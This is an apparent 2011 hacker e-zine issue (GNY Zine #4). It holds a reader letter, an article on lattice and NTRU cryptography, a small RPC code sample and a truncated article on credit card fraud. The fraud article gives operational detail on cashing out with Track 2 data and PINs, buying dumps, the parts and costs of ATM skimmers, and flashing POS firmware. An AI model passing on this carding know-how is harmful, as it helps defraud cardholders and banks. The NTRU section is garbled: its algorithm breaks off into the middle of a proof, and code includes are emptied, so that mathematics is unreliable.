本文共 128943 字,大约阅读时间需要 429 分钟。
,yNNNNNNNNo ,mMMMMMMMMd, _/', `; `; `\ -Mm oMd `NM: , _..,-'' ' ` ` `\ :Mm mM oMN mM: | ;._.,,-' .| |,_ ,, `\ .NMmmmmmmMM 'MMmmmmmNMN' -dh dd. | `;' ;' ;, `, ; | ' ' . \ :Mm MM. *purr* `; __` ,'__ ` , ` ; | ; \ dNNNNNNNNN, MM. yM :Mm MM. ; (6_); (6_) ; | , \ ' | NM: :My MM. yM :Mm MM. ;; _,' ,. ` `, ' `-._ | MM: :MN MM. yM :Mm MM. ,;.=..`_..=.,' -' ,'' _,--'' MM: :MM mMNmmmmmMM :Mm MM. _pb__\,`"=,,,=="',___,,,-----'''----'_'_'_''-;'' -----------------------'''''''''''''' hM) /' .h+ sh :hdddddddh/ dd` :ds oddddddddy. ,ddddddd-d ,yddddddddo ,/ ,/'ddddddd` -Mm+++++++oMM mMs:::::oMm MM. /Mh MM::::::hMh Mm+````` yMh`````yMM /' /Mh```````` /sssyMMssso- mM/ oMM MM. /Mh MM :+/ 'hhhhhhdM, yMh hh__,,-' /' MMNNNNNNNN. .MM NMdyyyyydMN MMdyyyyymMh MM ,,,,,,,,MM sMN,/'_,,--''Mo My```````` `o+ `+ooooooo+` .+oooooooo: oo .oooooooo+: `/o| (ooooo /o- My `' My +: 0x01 Introduction || 0x08 MapReduce, Part 2 elchupathingy 0x02 Feedback + Edits || 0x09 Cameras + DVRs Scan storm 0x03 Lattice-Based Cryptography rattle || 0x0a 303-833-00xx Scan Shadytel, Inc 0x04 duper's Code Corner duper || 0x0b bit.ly Shenanigans Silks, elchupa 0x05 The Tech Behind Credit Cards K141 || 0x0c Programming Challenge storm 0x06 Brief Notes on Kiosk Hacking storm || 0x0d The Scoop on LIGATT 0x07 Linux Rootkit Dev Update duper || 0x0e Et Cetera, Etc. teh crew[==================================================================================================] [================================================] Go Null Yourself E-Zine Issue #4 - Spring/April 2011 www.GoNullYourself.org "It makes sense if you don't think about it" [================================================][==================================================================================================]-=[ 0x01 IntroductionAhoy there, and welcome to issue #4 of GNY Zine - just in time for spring! The sun is shining, thebirds are chirping, and with the advent of laptops, now all you little h4xx0rs have no excuse not togo outside! For those who still prefer the cool depths of a basement, though, then GNY Zine has allyou need in lieu of vitamin D and a social life. Like crypto! And rootkits! And leet ASCII art!We may not have iced tea, but here's a recipe to make up for it: * 8 cups water * 3 orange pekoe tea bags * 3/4 cup SPLENDA® No Calorie Sweetener, Granulated * 1/2 cup lemon juice 1. In a large saucepan, heat water to a rapid boil. Remove from heat and drop in the tea bags. Cover and let steep for 1 hour. 2. In a large pitcher, combine the steeped tea and the SPLENDA® Granulated Sweetener. Stir until dissolved, then stir in lemon juice. Refrigerate until chilled. Hey, it got quite a few good reviews and only has 11 Calories.Anyways, don't want to keep you. Those 3100 lines below aren't gonna read themselves. Enjoy thezine, and see ya in the summer.Notable Events============== January 2011 - Leak of LIGATT Security/Gregory D. Evans January 31, 2011 - Go Null Yourself turns 3-years-old February 3, 2011 - Exhaustion of remaining IPv4 address space February 2011 - Leak of HBGary, Inc.-=-=-Now, on to formalities...If you are interested in submitting content for future issues of GNY Zine, we would be happy toreview it for publication. Content may take many forms, whether it be a paper, review, scan, orfirst-hand account of an event. Submissions of ASCII cover art that display the GNY logo in someway are also appreciated. Well-received topics include computer hacking and exploitation methods,programming, telephone phreaking (both analog and digital), system and network exploration, hardwarehacking, reverse engineering, amateur radio, cryptography and steganography, and social engineering.We are also receptive to content relating to concrete subjects such as science and mathematics,along with more abstract subjects such as psychology and culture. Both technical and non-technicalmaterial is accepted.Submissions of content, suggestions for and criticisms of the zine, and death threats may be sentvia: - IRC private message (storm, m0nkee, or Barney- @ irc.gonullyourself.org #gny) - Email (zine@gonullyourself.org)If there is enough feedback, we will publish some of the messages in future issues. Our PGP key isavailable for use below.We have devoted a lot of effort into this publication and hope that you learn something from readingit. Abiding by our beliefs, any information within this e-zine may be freely re-distributed,utilized, and referenced elsewhere, but we do ask that you keep the articles fully intact (unlessciting certain passages) and give credit to the original authors when and where necessary.Go Null Yourself, its staff members, and the authors of GNY Zine are not responsible for any harm ordamage that may result from the information presented within this publication. Although people willbe people and act in idiotic fashions, we do not condone, promote, or participate in illegalbehavior in any way.-----BEGIN PGP PUBLIC KEY BLOCK-----Version: GnuPG v1.4.11 (GNU/Linux)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g7oJ-----END PGP PUBLIC KEY BLOCK-----[==================================================================================================]-=[ 0x02 Feedback and EditsWe always strive to publish accurate information in GNY Zine, but we the authors and editors are infact human beings and are subject to making mistakes from time to time, despite our best efforts.The publication, compilation, and distribution of this e-zine is derived entirely from our passionfor technology and curiosity of how things tick. GNY Zine has no commercial influences. If youfind that there is an error in content that we have published, please do not hesitate to email us sothat it may be announced and corrected in the next issue. Not acting like a stuck-up elitist aboutit will probably invoke a more positive response too.With that being said, we are also receptive to content or personal experiences relevant toinformation presented in past issues. If you've written some code, applied a concept in a new way,or just want to voice your opinion about a topic, send us an email!We may be contacted at: zine@gonullyourself.org(PGP key is available in the Introduction)Please note that emails we like will be published in future issues, so specify if you wish for yourmessage to remain private or if you wish for us to redact certain personal information from it.----------------------------------------------------------------------------------------------------Turning Manning into the Feds turns an institution with relativelyunlimited power against Manning. The techniques used by Lamo were abetrayal of trust given (arguably without having been earned) to Lamo. Lamo is a snitch by definition. The fact that he still has hostingon domains like resist.ca, is further evidence that resist.ca can notbe trusted as an anarchist resource.The panel at HOPE in which Lamo was confronted framed the hackercommunity as one that is filled with snitches. Members of the paneltold stories about how they were turned in by people they collaboratedwith and trusted. Behavior like this closes doors to the flow ofinformation, welcomes the violence of authoritarian institutions, andsets the foundation for the privatization of security research. Behavior like Lamo's is in opposition to the safety and values of thehacker community, and as a result should not be allowed space. Idolizing individuals who act with such a disregard for the hackercommunity they claim to be a part of with a glowing expose is adisgrace to the hacker community.With disgust,evoltech>> Thanks for sending us your opinion. Though, we checked and it seems like Adrian's website is>> currently 404'ing (for those of you who didn't read the interview from issue #2, the URL is>> http://users.resist.ca/~adrian/). We actually followed up on this and contacted resist.ca about>> it, who replied:Hi there,Sorry we haven't responded to you yet about your question about Adrian Lamo's website on resist.ca.We removed his various accounts becuase his motivations seem to be in conflict with ours (seehttp://www.youtube.com/watch?v=ebLahUUr__s). Our project is politically motivated and we offerservices to projects that share our political alignment. Adrian's activities around the wikileaksdebacle suggest to us that he doesn't actually align with us politically.For more information on the kinds of political activism we support, please read our missionstatement at http://resist.ca/mission and our basis of unity at http://resist.ca/basis--The resist.ca collective>> So, there you go.[==================================================================================================]-=[ 0x03 Lattice-Based Cryptography-=[ Author: rattle-=[ Website: http://www.awarenetwork.org/ p o s t - q u a n t u m ,----,----,--,--,-----.|¯¯|_.-----.-----.----.---.-.-----.|¯¯|--.--.--. | __| _| | | = || _| = | = | _| = | = || | | | |____|__| |___ | __||____|_____|___ |__| |___._| __||__|__|___ | |_____|__| |_____| |__| |_____| A Lattice-Based Crypto System rattle // born // tobi-- 0 Requirements --------------------------------------------------------------I will expect readers to have a basic grasp of (linear) algebra. The terms I will use without further explanation are the following: - vector - linear independence - matrix - rank of a matrix - transpose of a matrix - scalar products - quotient rings Z(q) = { 0, ..., q-1 } (where all operations are performed modulo q)I also expect the reader to have a certain idea of computational complexity, ifeven only the roughest. You should have heard of the following notions: - Big-O notation (Landau symbols) - Time/Space complexity of an algorithmI really can not give a complete introduction to these topics here. I wouldrecommend literature, but all the undergraduate books on these topics that Iknow are in German. ---- 0.1 Notation --------------------------------------------------------------When A is some (n x m)-matrix (this means it has n rows and m columns), thenthe entry in the i-th row and j-th column is denoted by A[i,j]. Similarly,if a is a vector (which is just a (n x 1)-matrix), we will denote the i-th entry of this vector by a[i]. The transpose of a matrix A is denoted by A°.The canonical basis of real space will be denoted by e(1)...e(n), which arethe vectors defined by e(i)[j]=1 <=> i=j and e(i)[j]=0 otherwise.We will denote the real numbers by R, the integer numbers by Z. The notation X^n is to be read as "X to the n" and denotes Cartesian powers if X is a set,otherwise it means multiplying X with itself n times, duh. In real space, if a and b are vectors, we denote by = a[1]·b[1] + ··· + a[n]·b[n]the Euclidean scalar product.-- 1 Introduction --------------------------------------------------------------Given linearly independent vectors B[1],...,B[n] in R^n, the lattice spannedby these vectors is the set L = { a[1]·B[1] + ... + a[n]·B[n] | a in Z^n }of all integer linear combinations of them. The following is an example in R^2:Each lattice point is marked by an x and the 'grid' has been ASCII-modelledfor your convenience. ^ |· · ·. · · ·. · · 7 x · x · x · | ·. · · ·. · · ·. · 6 | x · x · x | · ·. · · ·. · · · 5 | · x · x · | ·. · · ·. · · ·. · 4 | x · x · x | · ·. · · ·. · · ·. 3 | · x · x · | · · ·. · · ·. · 2 | x · x · x | · ·. · · ·. · · ·. · 1 | · x · x · x |· · ·. · · ·. · · --+---------------------------x---------------------------x-----------------> | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | Figure 1: Example of a two-dimensional Lattice Now, consider the following picture. We have added a "target" vector (marked €)and a circle around it intersecting the closest lattice point, which is p=(5,3)in this case. ^ |· · ·. · · ·. · · 7 x · x · x · | ·. · · ·. · · ·. · 6 | x · x · x | · ·. · · ·. · · · 5 | · x · x · | ·. · _·_ ·. · · ·. · 4 | x Ž · ` x · x | · ·. | · € | · ·. · · ·. 3 | · p , · x · | · · ¯ ¯ ·. · · ·. · 2 | b · x · x | · ·. · · ·. · · ·. · 1 | · a · x · c |· · ·. · · ·. · · --+---------------------------d---------------------------x-----------------> | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | Figure 2: Lattice with target vector Using the basis a=(4,1) and b=(1,2), it is easy to see that p = a + b. On theother hand, using the basis c=(18,1) and d=(7,0), the same point has the lesssimple description p = 3·c - 7·d. When passing to higher dimensions, thisphenomenon escalates drastically. This way, we obtain a computational problemthat varies from easy to virtually impossible to solve, depending very much onon the lattice basis used.---- 1.1 Lattice Problems ------------------------------------------------------Let L be a lattice and g some real value greater or equal to one. We denote by d(x,y) the distance from the point x to the point y. The lattice approximation problems are the following: CLOSEST VECTOR PROBLEM -- CVP(g): For any vector t in R^n, let y be the lattice point closest to t. The task is to find a lattice point x not equal to t such that d(x,t) is less or equal to g·d(y,t). In other words, x is no further from t than g times the distance from t to any lattice point. SHORTEST VECTOR PROBLEM -- SVP(g): Find a vector x such that x is no longer than g times the shortest lattice vector. This is the special case of the CVP where t=(0,...,0) is the origin. We also write SVP = SVP(1) and CVP = CVP(1) for the non-approximative problems.---- 1.2 Lattice-based Encryption: Breakdown -----------------------------------Based on these problems, we can build an assymetrical cryptosystem, which is roughly described as follows: a) Choose a random "good" basis and keep it as a private key. b) Hand out a "bad" basis for the same lattice as a public key. c) Somehow find a way to encode your messages as lattice points. d) Encrypt a lattice point by simply distorting it randomly by a small vector. e) Decryption now means that you have to find the lattice point closest to the distorted vector (because it was the original message). This is now equivalent to solving the CVP, which should only be possible when in possession of a "good" basis.---- 1.3 Analysis of SVP -------------------------------------------------------We now give a brief historical analysis of the hardness of the SVP(g) - one should note here that the CVP(g) is harder than the SVP(g), therefore it wouldsuffice if the SVP(g) was hard to solve. And indeed, from the algorithms known so far, it seems that we can either achieve a polynomial runtime or a polynomial approximation factor, but not both: +--------+--------------+--------+-------------------------------------+ | g | Runtime | Space | Reference | +--------+--------------+--------+-------------------------------------+ | 1 | 2^O(n) | 2^O(n) | [JHLW11, Combinatorial SVP-Solver] | | 1 | 2^O(n log n) | poly | [Kan83] | | poly | 2^O(n) | 2^O(n) | [MR09] | | 2^O(n) | poly | ? | [LLL82] | +--------+--------------+--------+-------------------------------------+ This has led to the following conjecture: Conjecture 1.1. There is no polynomial time algorithm that approximates lattice problems to within polynomial factors.As far as exponential-time exact solvers are concerned, they have become practical even for small instances just in the recent years: +------+-------------------------+----------+-----------+ | Year | Authors | Time | Space | +------+-------------------------+----------+-----------+ | 2001 | Ajtai, Kumar, Sivakumar | 2^O(n) | 2^O(n) | | 2004 | Regev | 2^(16n) | 2^(8n) | | 2008 | Nguyen, Vidick | 2^(5.9n) | 2^(3n) | | 2010 | Pujol, Stelhé | 2^(2.5n) | 2^(1.2n) | +------+-------------------------+----------+-----------+ One should note, however, that lattice reduction methods such as [LLL82] seem toperform better in practice than their theoretic worst-case guarantees suggest.This is not fully explained yet, but has experimental evidence: In [GN08], different algorithms and several distributions on lattices were compared withthe result that they provide an approximation ratio of roughly g=d^n where d isclose to 1.012. Still, it seems that approximation rations of (1.01)^n are outside the reach of known lattice reduction algorithms. We should note that for __________ / n g > / -------- ¯\/ log(n)the SVP(g) is not NP-hard unless the polynomial time hierarchy collapses (you should read this as "is not NP-hard"). However, it was shown in [Ajt98] that theSVP=SVP(1) actually is NP-hard. Furthermore, there are no quantum algorithms known that perform better than the classical ones. Because of this, lattice-based cryptography is often labelled "post-quantum" cryptography. In summary, wemay very well assume that the SVP is a hard problem.-- 2 NTRU ----------------------------------------------------------------------We will now present a practical implementation of the rough idea presented in subsection 1.2. For the mathematically inclined, a detailed explanation of whythe encryption scheme really works the way we outlined in 1.2 can be found in [JHLW11]. ---- 2.1 Mathematical Necessities ----------------------------------------------We first require a couple of mathematical definitions and results, since NTRU operates on a very special kind of lattices.Definition 2.1. Let Z(q) = {0,...,q-1} be the integer numbers from 0 to q-1, with all operations performed modulo q. We denote by p: Z --> Z(q) the map thatsends any number n to (n mod q). When A is a matrix with integer entries, wedenote by p(A) the matrix with entries in Z(q) which is obtained by reducing allentries modulo q.Definition 2.2. Let v in R^n be a vector an A an (n x n)-matrix. We then definethe matrix / \ | v[0] (A·v)[0] ··· (A^(n-1)·v)[0] | | · · · | (A*v) := | · · · | | · · · | | v[n] (A·v)[n] ··· (A^(n-1)·v)[n] | \ / whose i-th column is the result of applying A exactly (i-1) times to v. We alsodefine the special (n x n)-matrix / | \ | 0 · · · 0 | 1 | | ---------------+--- | | 1 0 · · 0 | 0 | T := | 0 · · | · | | · · · | · | | · · 0 | · | | 0 · · 0 1 | 0 | \ | /and will make frequent use of the matrix (T*v), which is the matrix whose i-thcolumn is just v, rotated by i. Lemma 2.3. For any two vectors f and g, 1) (T*f)·g = (T*g)·f 2) T·(T*f) = (T*f)·T 3) (T*f)·(T*g) = (T*((T*f)·g))Proof. Consider the (k x k)-matrices / \ | 0 · · 0 1 | | · · 0 | I(k) := | · · · | | 0 · · | | 1 0 · · 0 | \ /and the symmetrical (n x n)-matrices / | \ | I(k) | 0 | S(k) := | ------+-------- | | 0 | I(n-k) | \ | / Then, we have / \ / \ / \ | g[1] g[n] ·· g[2] | | | | | | g[2] g[1] ·· g[3] | | | | | (T*g)·f = | · · · | · f = | · | = | · | =: h | · · · | | · | | · | | g[n] g[n-1] ·· g[1] | | | | | \ / \ / \ /And clearly, (T*f)·g = h. This proves part (1) already. For the second state-ment, we calculate (all index operations are performed modulo n): __ n = > (S(i-1)·f)[k] · ((T^j)·g)[k] ¯¯ k=1 __ i-1 __ n = > f[i-k]·g[k-j] + > f[n+i-k]·g[k-j] ¯¯ k=1 ¯¯ k=i __ i __ n+1 = > f[i-k+1]·g[k-j-1] + > f[n+i-k+1]·g[k-j-1] ¯¯ k=2 ¯¯ k=i+1 __ i __ n = > f[i-k+1]·g[k-j-1] + > f[n+i-k+1]·g[k-j-1] ¯¯ k=1 ¯¯ k=i+1 = which yields / \ / \ / \ | | | | | | | | | | | | T · | · | = | · | = | · | | · | | · | | · | | | | | | | \ / \ / \ / and therefore, / \ | | T^(j-1) · h = (T*h)_j = | ... |. | | \ / With this, it is now obvious that / \ / \ | f[1] f[n] · · f[2] | | g[1] g[n] · · g[2] | | f[2] f[1] · · f[3] | | g[2] g[1] · · g[3] | (T*f)·(T*g) = | · · · | · | · · · | = (T*h). | · · · | | · · · | | f[n] f[n-1] · · f[1] | | g[n] g[n-1] · · g[1] | \ / \ / q.e.d.Definition 2.4. Let n and d be positive integer numbers and d < n. A vector f inZ^n is called a d-vector if it has exactly d negative and d+1 positive entries.---- 2.2 The NTRU Cryptosystem -------------------------------------------------We can now describe the process of key generation for the NTRU cryptosystem:________________________________________________________________________________Algorithm 1: NTRU-KEY-GENERATION¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯Input: A prime number n, a "modulus" q, a "weight bound" d and an integer p ( (T*f)[i,j]·m[j] + (T*g)[i,j]·r[j] ) ¯¯ j=1 __ n = > ( (T^(j-1)·f)[i]·m[j] + (T^(j-1)·g)[i]·r[j] ) ¯¯ j=1 __ n = > ( f[i-j+1]·m[j] + g[i-j+1]·r[j] ) ¯¯ j=1We write f' := f - e(1), which is the vector chosen in step 1 of the NTRU-KEY-GENERATION algorithm. Estimating the absolute value of v[i], it is maximized for f'[i-j+1] = -p if m[j] = -1 and g[i-j+1] = -p if r[j] = -1 p if m[j] = 1 p if r[j] = 1 Since f=f'+e(1), we get |v[i]| <= (2d+1)·p + (2d+1)·p + 1 = 4dp + 2p + 1, yielding (#), if we want the absolute values of v to be bounded by q/2; q.e.d.-- 3 Further Reading -----------------------------------------------------------If you would like to read the fullblown math article, it is reference [JHLW11]and the URL to the PDF is given below.---- 3.1 References ------------------------------------------------------------[LLL82] A.K. Lenstra, H.W. Lenstra, and L. Lovasz, Factoring polynomials with rational coefficients, Math. Ann. 261 (1982), 515-534.[Kan83] Ravi Kannan, improved algorithms for integer programming and related lattice problems, In Proc. 15th ACM Symp. on Theory of Computing (STOC)(1983), 193-206.[Ajt98] M. Ajtai, The shortest vector problem in L2 is NP-hard for randomized reduc-tions, Proc. of 30th STOC. ACM (1998), 10-19.[GN08] N.Gama and P.Q.Nguyen, Predicting lattic reduction, Advances in Cryptology, Proc. Eurocrypt '08, Lecture Notes in Computer Science, Springer 2008[MR09] D.J. Bernstein, J. Buchmann and E. Dahmen, Post Quantum Cryptography, chapter Lattice-based Cryptography by Daniele Micciancio and Oded Regev, 147-191, Springer 2009.[JHLW11] Jesko Huettenhain, Lars A. Wallenborn, Lattice-Based Methods, Seminar Topics in Post-Quantum Cryptography (2011), http://www.uni-bonn.de/~rattle/works/lattices.pdf-----------------------------------------------------------------------[ eof ]--[==================================================================================================]-=[ 0x04 duper's Code Corner-=[ Author: duper-=[ Website: http://projects.ext.haxnet.org/~super/ o o o | | | o-O o o o-o o-o o-o o-o o-o o-o o-O o-o o-o o-o o-o o-o o-o o-o| | | | | | |-' | \ | | | | | |-' | | | | | | |-' | o-o o--o O-o o-o o o-o o-o o-o o-o o-o o-o o-o o o o o-o o | o/** * Code for creating the client and server sides of a Transport * Independent Remote Procedure Call "Hello World" in Linux * * i.e. not based on the SunRPC code of glibc * * Super-user access is not required, only a running portmapper. */#include #include #include #include /** * gcc -o create-tcp-rpc-client create-tcp-rpc-client.c -ltirpc */void vexit(const char *funcname){ perror(funcname); exit(EXIT_FAILURE);}void dispatch(struct svc_req *request, SVCXPRT *xprt){ FILE *afile = fopen("/tmp/a.txt", "a"); if(!afile) vexit("fopen"); fputs("Hello World!\n", afile); fclose(afile); return;}int main(void){ SVCXPRT* svcxprt = svctcp_create(RPC_ANYSOCK, 0, 0); if(!svcxprt) vexit("svctcp_create"); printf("xp_sock: %d\n", svcxprt->xp_sock); printf("xp_port: %d\n", svcxprt->xp_port); if(svc_register(svcxprt, 101337, 1, dispatch, IPPROTO_TCP) != 1) vexit("svc_register"); svc_run(); exit(EXIT_SUCCESS);}#include #include #include #include /** * gcc -o create-tcp-rpc-client create-tcp-rpc-client.c -ltirpc */void clnt_vexit(enum clnt_stat value){ clnt_perrno(value); exit(EXIT_FAILURE);}void vexit(const char *funcname){ perror(funcname); exit(EXIT_FAILURE);}int main(void){ char *in = "", *out = ""; enum clnt_stat s = rpc_call("192.168.1.113", 101337, 1, 1, xdr_int, in, xdr_int, out, "tcp"); if(s != RPC_SUCCESS) clnt_vexit(s); exit(EXIT_SUCCESS);}[==================================================================================================]-=[ 0x05 The Tech Behind Credit Card Fraud-=[ Author: K141[[ Introduction ]] ---------------Plastics carding is by far the most profitable type of credit card fraud - the replication, orspoofing, of magnetic stripe data to a secondary suitable medium host (magstripe card) being themost common form. I have written this paper to address the followed criminal procedures whileexplaining these steps as basically as possible. There are numerous papers and articles releasedthat do not even touch the issues at hand; how these criminals obtain this information and moregenerally, who does what in the spectrum of physical carding.While 'physical carding' or plastics carding is dwarfed by the volume of virtual/online cardingdone, it still stands as a major contender. Technologies exist which could eradicate this type ofattack; however, we see no intention of this from the banks as it involves critical changes in thecurrent infrastructure. To date, I see no tech-related reason why this form of fraud is stillallowed to be committed.[[ Track Data ]] ------------Within a credit card (high-coercive magnetic stripe card), there exists 3 tracks of data (3 sectionsthat are capable of storing data separately). This paper will cover the logical side of magstripeencoding (all 3 tracks and relevant data) and not the physical, that is, the widths of each track,polarities and coercivity. After reading, you should be more familiar with the processes involved inhow criminals obtain and handle this data to produce profits.The majority of the time, Track 1 data is not needed for cashing out with plastics. This is theinformation that will be shown on the receipt and/or POS (point-of-sale) terminal. There exist someterminals, though, that require Track 1 to be present, and a good attacker (or 'carder') will alwaysfill their Track 1 field. Luckily for the attacker, Track 1s can be generated entirely based onTrack 2 data. It is important to mention that Track 1 is derived from the information on Track 2 andis often used as a fail-safe if Track 2 is or can not be read. This is also the only track thataccepts alphanumeric characters.Track 2 data is the most important for 'cashing out'. This is where the relevant information forgenerating Track 1 data is held, as well as other data that allows a transaction to occur.Track 3 data, mostly, is null.Before a transaction may occur, a PIN is necessary for authentication. With that said, generallyspeaking, Track 2 data + PIN = the ability to cash out with that card.[[ Obtaining Track Data ]] -----------------------On many hacking/carding forums, there exist endless advertisements of "Dumps + PINs for sale". Thesesellers, the majority of the time, are fraudulent (oh, irony) and will request a large 'minimumamount' in order to successfully defraud at least $300 or so to make the scam worth their while. Ifa seller is genuine and is selling Track 2 data + PINs (a rarity, but it does occur), he/she knowsthe balance of the said account and knows this to be low. There do exist some legitimate sellers;however, the data they sell is typically Track 2 only and can only be cashed out by the minority ofthe carding community.That being said, online vendors are not the only source of 'dumps'. An assailant may obtain Track 2data with PINs by either building or buying their own card skimmer.[[ ATM Skimming ]] --------------A 'skimmer' device is typically placed over the mouth of a genuine ATM in order to steal track databefore the card is legitimately read by the machine. As the victim's credit card is entered into theATM, it passes through the false fascia (the skimming device) and the Track 2 section passes overthe Track 2 read head, stealing the information. As it only passes over the read head, this card isstill able to enter the ATM machine and offer the same functionality as an un-tampered ATM.If the skimming device is coupled with a miniature camera, it will take this Track 2 data, parse itinto a file on its storage medium, and also timestamp this data for later reference to thetimestamped video footage of pin entry. These skimmers must then be collected from the ATM after theattack is complete (usually during early hours in the morning to avoid detection, or when thebattery has run low).If the skimming device is coupled with a pin-pad overlay, it will transmit Track 2 data and PIN viaSMS or Bluetooth to the attacker's phone, reducing the risk of the attacker being caught andconcurrently allowing remote operation. These skimmers will only need to be re-visited when thebattery runs low.An ATM skimming device is comprised of a few components: - Fascia: To overlay the ATM mouth without suspicion. - T2 Read Head: A small device to read the Track 2 data from the magnetic stripe card. Note, ideally a skimmer will read only one track of information, as to keep the size of the device minimal. - Custom printed PCB: This parses the data taken from the Track 2 head and stores it to addressed memory locations, usually a Micro-SD card or to the Bluetooth module. - Bluetooth module (optional): A Bluetooth or SMS module is often used for remotely transmitting Track 2 data, along with PINs back to the carder. - Battery: To power the device.The components required to build these devices are inexpensive, but the main obstacle towards thebuilding of a skimmer is technical know-how. I have found the price of pre-built skimmers currentlyto range from $600-$8000, as opposed to $100-700 in building costs.[[ POS Skimming ]] --------------Point of sale skimming is a software-based attack in which the firmware of the POS terminal isflashed, rather than a physical device inserted. Common models are the VeriFone Vx510 and variousother Ingenico devices. These skimmers are mostly 'offline' skimmers, in which the target willbelieve he/she is making a purchase with their card, and a transaction will appear to process alongwith a receipt print, but no charge will actually occur. Instead, the card has just been swiped andthe target has entered their PIN. A flashed firmware can be programmed to output a later 